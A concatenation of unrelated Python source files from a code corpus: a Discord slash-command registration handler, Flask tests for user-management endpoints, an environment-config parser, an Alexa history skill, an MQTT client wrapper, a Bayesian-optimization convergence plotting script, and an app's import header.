from .utils.types import Singleton, TypeCache, Descripted
COMMAND_NAME_REGEX = re.compile(r"^[\w-]{1,32}$")
_log = logging.getLogger(__package__)
_options_type_link = {
# TODO: Implement mentionable:
Signature.empty: AppCommandOptionType.STRING,
str: AppCommandOptionType.STRING,
int: AppCommandOptionType.INTEGER,
bool: AppCommandOptionType.BOOLEAN,
float: AppCommandOptionType.NUMBER,
User: AppCommandOptionType.USER,
Channel: AppCommandOptionType.CHANNEL,
Role: AppCommandOptionType.ROLE,
}
def command(
name: Optional[str] = None,
description: Optional[str] = "Description not set",
enable_default: Optional[bool] = True,
guild: Union[Snowflake, int, str] = None,
cooldown: Optional[int] = 0,
cooldown_scale: Optional[float] = 60,
cooldown_scope: Optional[ThrottleScope] = ThrottleScope.USER
):
"""
Command option types are designated by using type hints.
str - String
int - Integer
bool - Boolean
float - Number
pincer.objects.User - User
pincer.objects.Channel - Channel
pincer.objects.Role - Role
Mentionable is not implemented
"""
# TODO: Fix docs
# TODO: Fix docs w guild
# TODO: Fix docs w cooldown
# TODO: Fix docs w context
# TODO: Fix docs w argument descriptions
# TODO: Fix docs w argument choices
def decorator(func: Coro):
if not iscoroutinefunction(func) and not isasyncgenfunction(func):
raise CommandIsNotCoroutine(
f"Command with call `{func.__name__}` is not a coroutine, "
"which is required for commands."
)
cmd = name or func.__name__
if not re.match(COMMAND_NAME_REGEX, cmd):
raise InvalidCommandName(
f"Command `{cmd}` doesn't follow the name requirements."
"Ensure to match the following regex:"
f" {COMMAND_NAME_REGEX.pattern}"
)
try:
guild_id = int(guild) if guild else MISSING
except ValueError:
raise InvalidCommandGuild(
f"Command with call `{func.__name__}` its `guilds` parameter "
"contains a non valid guild id."
)
if len(description) > 100:
raise CommandDescriptionTooLong(
f"Command `{cmd}` (`{func.__name__}`) its description exceeds "
"the 100 character limit."
)
if reg := ChatCommandHandler.register.get(cmd):
raise CommandAlreadyRegistered(
f"Command `{cmd}` (`{func.__name__}`) has already been "
f"registered by `{reg.call.__name__}`."
)
sig, params = get_signature_and_params(func)
pass_context = should_pass_ctx(sig, params)
if len(params) > (25 + pass_context):
raise TooManyArguments(
f"Command `{cmd}` (`{func.__name__}`) can only have 25 "
f"arguments (excluding the context and self) yet {len(params)} "
"were provided!"
)
options: List[AppCommandOption] = []
for idx, param in enumerate(params):
if idx == 0 and pass_context:
continue
annotation, required = sig[param].annotation, True
argument_description: Optional[str] = None
choices: List[AppCommandOptionChoice] = []
if isinstance(annotation, str):
TypeCache()
annotation = eval(annotation, TypeCache.cache, globals())
if isinstance(annotation, Descripted):
argument_description = annotation.description
annotation = annotation.key
if len(argument_description) > 100:
raise CommandDescriptionTooLong(
f"Tuple annotation `{annotation}` on parameter "
f"`{param}` in command `{cmd}` (`{func.__name__}`), "
"argument description too long. (maximum length is 100 "
"characters)"
)
if get_origin(annotation) is Union:
args = get_args(annotation)
if type(None) in args:
required = False
# Do NOT use isinstance as this is a comparison between
# two values of the type type and isinstance does NOT
# work here.
union_args = [t for t in args if t is not type(None)]
annotation = (
get_index(union_args, 0)
if len(union_args) == 1
else Union[Tuple[List]]
)
if get_origin(annotation) is Choices:
args = get_args(annotation)
if len(args) > 25:
raise InvalidAnnotation(
f"Choices/Literal annotation `{annotation}` on "
f"parameter `{param}` in command `{cmd}` "
f"(`{func.__name__}`) amount exceeds limit of 25 items!"
)
choice_type = type(args[0])
if choice_type is Descripted:
choice_type = type(args[0].key)
for choice in args:
choice_description = choice
if isinstance(choice, Descripted):
choice_description = choice.description
choice = choice.key
if choice_type is tuple:
choice_type = type(choice)
if type(choice) not in choice_value_types:
# Properly get all the names of the types
valid_types = list(map(
lambda x: x.__name__,
choice_value_types
))
raise InvalidAnnotation(
f"Choices/Literal annotation `{annotation}` on "
f"parameter `{param}` in command `{cmd}` "
f"(`{func.__name__}`), invalid type received. "
"Value must be a member of "
f"{', '.join(valid_types)} but "
f"{type(choice).__name__} was given!"
)
elif not isinstance(choice, choice_type):
raise InvalidAnnotation(
f"Choices/Literal annotation `{annotation}` on "
f"parameter `{param}` in command `{cmd}` "
f"(`{func.__name__}`), all values must be of the "
"same type!"
)
choices.append(AppCommandOptionChoice(
name=choice_description,
value=choice
))
annotation = choice_type
param_type = _options_type_link.get(annotation)
if not param_type:
raise InvalidAnnotation(
f"Annotation `{annotation}` on parameter "
f"`{param}` in command `{cmd}` (`{func.__name__}`) is not "
"a valid type."
)
options.append(
AppCommandOption(
type=param_type,
name=param,
description=argument_description or "Description not set",
required=required,
choices=choices or MISSING
)
)
ChatCommandHandler.register[cmd] = ClientCommandStructure(
call=func,
cooldown=cooldown,
cooldown_scale=cooldown_scale,
cooldown_scope=cooldown_scope,
app=AppCommand(
name=cmd,
description=description,
type=AppCommandType.CHAT_INPUT,
default_permission=enable_default,
options=options,
guild_id=guild_id
)
)
_log.info(f"Registered command `{cmd}` to `{func.__name__}`.")
return func
return decorator
class ChatCommandHandler(metaclass=Singleton):
"""
Class containing methods used to handle various commands
"""
managers: Dict[str, Any] = {}
register: Dict[str, ClientCommandStructure] = {}
# Endpoints:
__get = "/commands"
__delete = "/commands/{command.id}"
__update = "/commands/{command.id}"
__add = "/commands"
__add_guild = "/guilds/{command.guild_id}/commands"
__get_guild = "/guilds/{guild_id}/commands"
__update_guild = "/guilds/{command.guild_id}/commands/{command.id}"
__delete_guild = "/guilds/{command.guild_id}/commands/{command.id}"
# TODO: Fix docs
def __init__(self, client):
# TODO: Fix docs
self.client = client
self._api_commands: List[AppCommand] = []
logging.debug(
"%i commands registered.",
len(ChatCommandHandler.register.items())
)
self.client.throttler.throttle = dict(map(
lambda cmd: (cmd.call, {}),
ChatCommandHandler.register.values()
))
self.__prefix = f"applications/{self.client.bot.id}"
async def get_commands(self) -> List[AppCommand]:
# TODO: Fix docs
# TODO: Update if discord adds bulk get guild commands
guild_commands = await gather(*map(
lambda guild: self.client.http.get(
self.__prefix + self.__get_guild.format(
guild_id=guild.id if isinstance(guild, Guild) else guild
)
),
self.client.guilds
))
return list(map(
AppCommand.from_dict,
await self.client.http.get(self.__prefix + self.__get)
+ [cmd for guild in guild_commands for cmd in guild]
))
async def remove_command(self, cmd: AppCommand, keep=False):
# TODO: Fix docs
# TODO: Update if discord adds bulk delete commands
remove_endpoint = self.__delete_guild if cmd.guild_id else self.__delete
await self.client.http.delete(
self.__prefix + remove_endpoint.format(command=cmd)
)
if not keep and ChatCommandHandler.register.get(cmd.name):
del ChatCommandHandler.register[cmd.name]
async def remove_commands(
self,
commands: List[AppCommand],
/,
keep: List[AppCommand] = None
):
# TODO: Fix docs
await gather(*list(map(
lambda cmd: self.remove_command(cmd, cmd in (keep or [])),
commands
)))
async def update_command(self, cmd: AppCommand, changes: Dict[str, Any]):
# TODO: Fix docs
# TODO: Update if discord adds bulk update commands
update_endpoint = self.__update_guild if cmd.guild_id else self.__update
await self.client.http.patch(
self.__prefix + update_endpoint.format(command=cmd),
data=changes
)
for key, value in changes.items():
setattr(ChatCommandHandler.register[cmd.name], key, value)
async def update_commands(
self,
to_update: Dict[AppCommand, Dict[str, Any]]
):
# TODO: Fix docs
await gather(*list(map(
lambda cmd: self.update_command(cmd[0], cmd[1]),
to_update.items()
)))
async def add_command(self, cmd: AppCommand):
# TODO: Fix docs
add_endpoint = self.__add
if cmd.guild_id:
add_endpoint = self.__add_guild.format(command=cmd)
res = await self.client.http.post(
self.__prefix + add_endpoint,
data=cmd.to_dict()
)
ChatCommandHandler.register[cmd.name].app.id = Snowflake(res['id'])
async def add_commands(self, commands: List[AppCommand]):
# TODO: Fix docs
await gather(*list(map(
lambda cmd: self.add_command(cmd),
commands
)))
async def __init_existing_commands(self):
# TODO: Fix docs
self._api_commands = await self.get_commands()
for api_cmd in self._api_commands:
cmd = ChatCommandHandler.register.get(api_cmd.name)
if cmd and cmd.app == api_cmd:
cmd.app = api_cmd
async def __remove_unused_commands(self):
"""
Remove commands that are registered by discord but not in use
by the current client!
"""
registered_commands = list(map(
lambda registered_cmd: registered_cmd.app,
ChatCommandHandler.register.values()
))
keep = []
def predicate(target: AppCommand) -> bool:
for reg_cmd in registered_commands:
reg_cmd: AppCommand = reg_cmd
if target == reg_cmd:
return False
elif target.name == reg_cmd.name:
keep.append(target)
return True
to_remove = list(filter(predicate, self._api_commands))
await self.remove_commands(to_remove, keep=keep)
self._api_commands = list(filter(
lambda cmd: cmd not in to_remove,
self._api_commands
))
async def __update_existing_commands(self):
"""
Update all commands where its structure doesn't match the
structure that discord has registered.
"""
to_update: Dict[AppCommand, Dict[str, Any]] = {}
def get_changes(
api: AppCommand,
local: AppCommand
) -> Dict[str, Any]:
update: Dict[str, Any] = {}
if api.description != local.description:
update["description"] = local.description
if api.default_permission != local.default_permission:
update["default_permission"] = local.default_permission
options: List[Dict[str, Any]] = []
if api.options is not MISSING:
if len(api.options) == len(local.options):
def get_option(args: Tuple[int, Any]) \
-> Optional[Dict[str, Any]]:
index, api_option = args
if opt := get_index(local.options, index):
return opt.to_dict()
options = list(filter(
lambda opt: opt is not None,
map(get_option, enumerate(api.options))
))
else:
options = local.options
if api.options is not MISSING and list(
map(AppCommandOption.from_dict, options)) != api.options:
update["options"] = options
return update
for idx, api_cmd in enumerate(self._api_commands):
for loc_cmd in ChatCommandHandler.register.values():
if api_cmd.name != loc_cmd.app.name:
continue
changes = get_changes(api_cmd, loc_cmd.app)
if not changes:
continue
api_update = []
if changes.get("options"):
for option in changes["options"]:
api_update.append(
option.to_dict()
if isinstance(option, AppCommandOption)
else option
)
to_update[api_cmd] = {"options": api_update}
for key, change in changes.items():
if key == "options":
self._api_commands[idx].options = list(map(
AppCommandOption.from_dict,
change
))
else:
setattr(self._api_commands[idx], key, change)
await self.update_commands(to_update)
async def __add_commands(self):
"""
Add all new commands which have been registered by the decorator
to Discord!
"""
to_add = deepcopy(ChatCommandHandler.register)
for reg_cmd in self._api_commands:
try:
del to_add[reg_cmd.name]
except IndexError:
pass
await self.add_commands(list(map(
lambda cmd: cmd.app,
to_add.values()
)))
async def initialize(self):
# TODO: Fix docs
await self.__init_existing_commands()
await self.__remove_unused_commands()
await self.__update_existing_commands()
await self.__add_commands()
|
StarcoderdataPython
|
5094039
|
import json
from tests.TestingSuite import BaseTestingSuite
class TestUsersResource(BaseTestingSuite):
def setUp(self):
print('Testing Users resources...')
super().setUp()
self.user_payload = json.dumps({
"email": "<EMAIL>",
"password": "password"
})
def test_successful_grab_users(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.get('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
})
self.assertEqual({
"email": "<EMAIL>",
"full_name": "Administrator",
"role": "admin"
}, response.json['users'][0])
self.assertEqual(200, response.status_code)
def test_bad_permissions_grab_users(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": '<PASSWORD>',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
})).json['jwt_token']
response = self.app.get('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
})
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_successful_delete_user(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'email': '<EMAIL>'
}))
self.assertEqual('Successfully deleted <EMAIL> from database', response.json['message'])
self.assertEqual(200, response.status_code)
def test_bad_permissions_delete_user(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json',
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response= self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'email': '<EMAIL>'
}))
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_bad_schema_error_delete_user(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'bad_key': '<EMAIL>'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_email_dne_error_delete_user(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.delete('/api/auth/users',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>"
}))
self.assertEqual("Couldn't find the user with given email address.", response.json['message'])
self.assertEqual(400, response.status_code)
def test_successful_user_role_update(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>",
"new_role": "admin"
}))
self.assertEqual({
'email': '<EMAIL>',
'full_name': 'test_user',
'role': 'admin'
}, response.json['user'])
self.assertEqual(200, response.status_code)
def test_bad_permissions_user_role_update(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>",
"new_role": "admin"
}))
self.assertEqual('Invalid token.', response.json['message'])
self.assertEqual(403, response.status_code)
def test_email_dne_error_update_user_role(self):
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
"email": "<EMAIL>",
"new_role": "admin"
}))
self.assertEqual("Couldn't find the user with given email address.", response.json['message'])
self.assertEqual(400, response.status_code)
def test_bad_schema_error_update_user_role(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'bad_key': '<EMAIL>',
'new_role': 'admin'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_role_dne_error_update_user_role(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=self.user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'email': '<EMAIL>',
'new_role': 'rolethatdoesnotexist'
}))
self.assertEqual('That role does not exist.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_successful_user_password_update(self):
test_user_payload = json.dumps({
"email": "<EMAIL>",
"password": "<PASSWORD>",
"full_name": "test_user"
})
self.app.post("/api/auth/signup",
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update/password',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}))
self.assertEqual('<EMAIL> password was updated', response.json['description'])
self.assertEqual(200, response.status_code)
def test_bad_schema_error_user_password_update(self):
test_user_payload = json.dumps({
'email': '<EMAIL>',
'password': '<PASSWORD>',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update/password',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'password': '<PASSWORD>',
'bad_key': 'badbadbad'
}))
self.assertEqual('Request is missing required fields.', response.json['message'])
self.assertEqual(400, response.status_code)
def test_unauthorized_password_user_password_update(self):
test_user_payload = json.dumps({
'email': '<EMAIL>',
'password': '<PASSWORD>',
'full_name': 'test_user'
})
self.app.post('/api/auth/signup',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload)
user_token = self.app.post('/api/auth/signin',
headers={
'Content-Type': 'application/json'
},
data=test_user_payload).json['jwt_token']
response = self.app.post('/api/auth/users/update/password',
headers={
'Content-Type': 'application/json',
'Authorization': f'Bearer {user_token}'
},
data=json.dumps({
'password': '<PASSWORD>',
'new_password': '<PASSWORD>'
}))
|
StarcoderdataPython
|
9671689
|
<filename>kluctl/utils/env_config_sets.py
import os
import re
def parse_env_config_sets(prefix):
r = re.compile(r"%s_(\d+)_(.*)" % prefix)
r2 = re.compile(r"%s_(.*)" % prefix)
ret = {}
for env_name, env_value in os.environ.items():
m = r.fullmatch(env_name)
if m:
idx = m.group(1)
key = m.group(2)
ret.setdefault(idx, {})[key] = env_value
else:
m = r2.fullmatch(env_name)
if m:
key = m.group(1)
ret.setdefault(None, {})[key] = env_value
return ret
|
StarcoderdataPython
|
6513832
|
<reponame>victorvasil93/flask-ask
import logging
import os
import re
from six.moves.urllib.request import urlopen
from flask import Flask
from flask_ask import Ask, request, session, question, statement
app = Flask(__name__)
ask = Ask(app, "/")
logging.getLogger('flask_ask').setLevel(logging.DEBUG)
# URL prefix to download history content from Wikipedia.
URL_PREFIX = 'https://en.wikipedia.org/w/api.php?action=query&prop=extracts' + \
'&format=json&explaintext=&exsectionformat=plain&redirects=&titles='
# Constant defining number of events to be read at one time.
PAGINATION_SIZE = 3
# Length of the delimiter between individual events.
DELIMITER_SIZE = 2
# Size of events from Wikipedia response.
SIZE_OF_EVENTS = 10
# Constant defining session attribute key for the event index
SESSION_INDEX = 'index'
# Constant defining session attribute key for the event text key for date of events.
SESSION_TEXT = 'text'
@ask.launch
def launch():
speech_output = 'History buff. What day do you want events for?'
reprompt_text = "With History Buff, you can get historical events for any day of the year. " + \
"For example, you could say today, or August thirtieth. " + \
"Now, which day do you want?"
return question(speech_output).reprompt(reprompt_text)
@ask.intent('GetFirstEventIntent', convert={ 'day': 'date' })
def get_first_event(day):
month_name = day.strftime('%B')
day_number = day.day
events = _get_json_events_from_wikipedia(month_name, day_number)
if not events:
speech_output = "There is a problem connecting to Wikipedia at this time. Please try again later."
return statement('<speak>{}</speak>'.format(speech_output))
else:
card_title = "Events on {} {}".format(month_name, day_number)
speech_output = "<p>For {} {}</p>".format(month_name, day_number)
card_output = ""
for i in range(PAGINATION_SIZE):
speech_output += "<p>{}</p>".format(events[i])
card_output += "{}\n".format(events[i])
speech_output += " Wanna go deeper into history?"
card_output += " Wanna go deeper into history?"
reprompt_text = "With History Buff, you can get historical events for any day of the year. " + \
"For example, you could say today, or August thirtieth. " + \
"Now, which day do you want?"
session.attributes[SESSION_INDEX] = PAGINATION_SIZE
session.attributes[SESSION_TEXT] = events
speech_output = '<speak>{}</speak>'.format(speech_output)
return question(speech_output).reprompt(reprompt_text).simple_card(card_title, card_output)
@ask.intent('GetNextEventIntent')
def get_next_event():
events = session.attributes[SESSION_TEXT]
index = session.attributes[SESSION_INDEX]
card_title = "More events on this day in history"
speech_output = ""
card_output = ""
i = 0
while i < PAGINATION_SIZE and index < len(events):
speech_output += "<p>{}</p>".format(events[index])
card_output += "{}\n".format(events[index])
i += 1
index += 1
speech_output += " Wanna go deeper into history?"
reprompt_text = "Do you want to know more about what happened on this date?"
session.attributes[SESSION_INDEX] = index
speech_output = '<speak>{}</speak>'.format(speech_output)
return question(speech_output).reprompt(reprompt_text).simple_card(card_title, card_output)
@ask.intent('AMAZON.StopIntent')
def stop():
return statement("Goodbye")
@ask.intent('AMAZON.CancelIntent')
def cancel():
return statement("Goodbye")
@ask.session_ended
def session_ended():
return "{}", 200
def _get_json_events_from_wikipedia(month, date):
url = "{}{}_{}".format(URL_PREFIX, month, date)
data = urlopen(url).read().decode('utf-8')
return _parse_json(data)
def _parse_json(text):
events = []
try:
slice_start = text.index("\\nEvents\\n") + SIZE_OF_EVENTS
slice_end = text.index("\\n\\n\\nBirths")
text = text[slice_start:slice_end];
except ValueError:
return events
start_index = end_index = 0
done = False
while not done:
try:
end_index = text.index('\\n', start_index + DELIMITER_SIZE)
event_text = text[start_index:end_index]
start_index = end_index + 2
except ValueError:
event_text = text[start_index:]
done = True
# replace dashes returned in text from Wikipedia's API
event_text = event_text.replace('\\u2013', '')
# add comma after year so Alexa pauses before continuing with the sentence
event_text = re.sub('^\d+', r'\g<0>,', event_text)
events.append(event_text)
events.reverse()
return events
if __name__ == '__main__':
if 'ASK_VERIFY_REQUESTS' in os.environ:
verify = str(os.environ.get('ASK_VERIFY_REQUESTS', '')).lower()
if verify == 'false':
app.config['ASK_VERIFY_REQUESTS'] = False
app.run(debug=True)
|
StarcoderdataPython
|
1680162
|
<filename>app/mqtt_handler.py<gh_stars>1-10
import logging
import time
from queue import SimpleQueue
import paho.mqtt.client as mqtt
class MQTTHandler(object):
def __init__(self, mqtt_broker_host, mqtt_broker_port=1883):
self.logger = logging.getLogger("mqtt.client")
self.mqtt_broker_host = mqtt_broker_host
self.mqtt_broker_port = mqtt_broker_port
self.mqtt_client = mqtt.Client(
client_id="telegram2mqtt", protocol=mqtt.MQTTv311, transport="tcp"
)
self.mqtt_client.on_connect = self.on_connect
self.mqtt_client.on_disconnect = self.on_disconnect
self.mqtt_client.on_message = self.on_message
self.pending_messages = SimpleQueue()
self.connected = False
self.logger.info("MQTT-Handler is initialized.")
def __call__(self):
self.mqtt_client.connect_async(self.mqtt_broker_host, port=1883)
self.mqtt_client.loop_start()
self.logger.info("MQTT-Client started.")
def on_connect(self, client, userdata, flags, rc):
self.logger.debug(f"MQTT-Client connected. Flags: {flags}. Result code {rc}")
self.connected = True
def on_disconnect(self, client, userdata, rc):
self.logger.debug(f"MQTT-Client disconnected. Result code {rc}")
def on_message(self, client, userdata, msg):
self.logger.debug(
f"MQTT-Client received mesage. Topic: '{msg.topic}' Message: '{msg.payload}'"
)
self.pending_messages.put((msg.topic, msg.payload))
def subscribe(self, topic):
while not self.connected:
self.logger.debug("Subscribe - wait for connect...")
time.sleep(0.5)
self.mqtt_client.subscribe(topic)
self.logger.debug(f"Subscribed to {topic}")
def unsubscribe(self, topic):
while not self.connected:
self.logger.debug("Unsubscribe - wait for connect...")
time.sleep(0.5)
self.mqtt_client.unsubscribe(topic)
self.logger.debug(f"Unsubscribed from {topic}")
def publish(self, topic, message):
while not self.connected:
self.logger.debug("Publish - wait for connect...")
time.sleep(0.5)
self.mqtt_client.publish(topic, payload=message)
self.logger.debug(f"Published message '{message}' on topic '{topic}'.")
def disconnect(self):
self.mqtt_client.disconnect()
self.mqtt_client.loop_stop()
self.logger.info("MQTT-Client stopped.")
|
StarcoderdataPython
|
4862115
|
# TODO: Missing script docstring. How should this script be run? What is this for?
# -------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License (MIT). See LICENSE in the repo root for license information.
# -------------------------------------------------------------------------------------------
import argparse
from pathlib import Path
from typing import List, Dict, Optional
import pandas as pd
import yaml
from pydantic import BaseModel, Field
from abex.plotting import plot_convergence
import matplotlib
import matplotlib.pyplot as plt
matplotlib.use("Agg")
BATCH_COLUMN = "Batch Number"
RUN_NAME_COLUMN = "Run Name"
class RunResultsConfig(BaseModel):
"""A class to collect configuration options for a run. Describes which files correspond to which batch number.
Properties
name: Name of the run. Used for plotting (labels etc).
objective_column: Which column in data files corresponds to the objective
folder: Which folder is the data located in
init_data_files: List of files corresponding to the initial files (batch 0)
batch_files: Dictionary mapping batch number to list of files corresponding to that batch.
(Paths are relative to the directory specified in the folder field)
batches_in_lexic_order: If True, ignore the batch_files field; instead, get all the files in the directory
specified by the folder field (other than the ones specified in init_data_files),
sort them lexicographically, and assume that they correspond to consecutive batches.
"""
name: str = ""
objective_column: Optional[str] = None
folder: Path = Field(default_factory=Path)
init_data_files: List[str] = Field(default_factory=list)
batch_files: Dict[int, List[str]] = Field(default_factory=dict)
batches_in_lexic_order: bool = False
def create_parser() -> argparse.ArgumentParser: # pragma: no cover
parser = argparse.ArgumentParser(
description="Plot convergence over several iterations of Bayesian Optimization, for possibly multiple runs."
"Assumes one file corresponds to one batch collected."
)
parser.add_argument(
"--config_files",
type=Path,
nargs="+",
required=True,
help="OptimizerConfig files describing which run and batch different files correspond to.",
)
parser.add_argument(
"--results_dir", type=Path, default=Path("Results"), help="The directory in which to save the resulting plot."
)
parser.add_argument(
"--output_path",
type=Path,
default=None,
help="If specified, the resulting path will be saved at this location "
"(otherwise a plot name will be generated).",
)
parser.add_argument("--title", type=str, default=None, help="The title for the plot.")
return parser
def load(file_paths: List[Path]) -> List[RunResultsConfig]: # pragma: no cover
configs = []
for yaml_file_path in file_paths:
with open(yaml_file_path) as f:
parsed_file = yaml.safe_load(f)
config = RunResultsConfig(**parsed_file)
configs.append(config)
return configs
def load_batches_with_run_and_batch_names(run_config: RunResultsConfig) -> pd.DataFrame: # pragma: no cover
# Get the initial_data
init_batch_paths = list(map(lambda filename: run_config.folder / filename, run_config.init_data_files))
init_batch_df = pd.concat(map(pd.read_csv, init_batch_paths)) # type: ignore # auto
init_batch_df[BATCH_COLUMN] = 0
# Get the DFs corresponding to batches
run_dfs = [init_batch_df]
if run_config.batches_in_lexic_order:
# If the remaining batch files are in lexicographic order, get all the filenames in folder and sort:
files_in_folder = [
child for child in run_config.folder.glob("**/*") if child.is_file() and child.suffix == ".csv"
]
# Get all csv files in folder that are not initial data files
batch_files = list(set(files_in_folder) - set(init_batch_paths))
# Sort in lexicographic order
batch_files = sorted(batch_files)
# Load into a DF
batch_dfs = list(map(pd.read_csv, batch_files))
for i, batch_df in enumerate(batch_dfs):
batch_df[BATCH_COLUMN] = i + 1 # type: ignore # auto
run_dfs.extend(batch_dfs)
else:
# Otherwise, get the files as specified by config
for batch_num, files in run_config.batch_files.items():
assert batch_num >= 0, "Batch number must be non-negative"
batch_paths = map(lambda filename: run_config.folder / filename, files)
batch_df = pd.concat(map(pd.read_csv, batch_paths)) # type: ignore # auto
batch_df[BATCH_COLUMN] = batch_num
run_dfs.append(batch_df)
run_df_combined = pd.concat(run_dfs)
run_df_combined[RUN_NAME_COLUMN] = run_config.name
return run_df_combined
def main(args): # pragma: no cover
configs: List[RunResultsConfig] = load(args.config_files)
# Assert all objective columns are the same:
assert len(set(map(lambda run_config: run_config.objective_column, configs))) == 1
all_runs_dfs = []
# For every config, get the dataframes for each batch + initial data
for run_config in configs:
run_df = load_batches_with_run_and_batch_names(run_config)
# Append the combined dataframe for this run to the list of all runs
all_runs_dfs.append(run_df)
combined_df = pd.concat(all_runs_dfs)
fig, _ = plot_convergence(
combined_df,
objective_col=configs[0].objective_column, # type: ignore # auto
batch_num_col=BATCH_COLUMN,
run_col=RUN_NAME_COLUMN,
)
assert fig is not None
# Possibly add title
if args.title:
fig.suptitle(args.title)
# Get output_path:
if args.output_path:
output_path = args.output_path
else:
filename = f"convergence_plot_{'__'.join([run_config.name for run_config in configs])}.png"
output_path = args.results_dir / filename
fig.savefig(output_path, bbox_inches="tight")
plt.close(fig)
if __name__ == "__main__": # pragma: no cover
args = create_parser().parse_args()
main(args)
|
StarcoderdataPython
|
8096675
|
<filename>main.py<gh_stars>0
from flask import Flask,redirect,render_template,request,url_for, session,jsonify
from datetime import datetime
from flask import send_file
import undetected_chromedriver as uc
from selenium.webdriver.common.by import By
import time
import os
import glob
from selenium.webdriver.support.ui import WebDriverWait
from threading import Thread
import csv
import sqlite3
import mysql.connector
import matplotlib.pyplot as plt
import threading
import base64
import re
import io
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.keys import Keys
from prediction.predictionstockmarket import predictDataSet
from prediction.predictionstockmarket import trainPredictDataSet
from prediction.tweets_sentiments import analysTweets
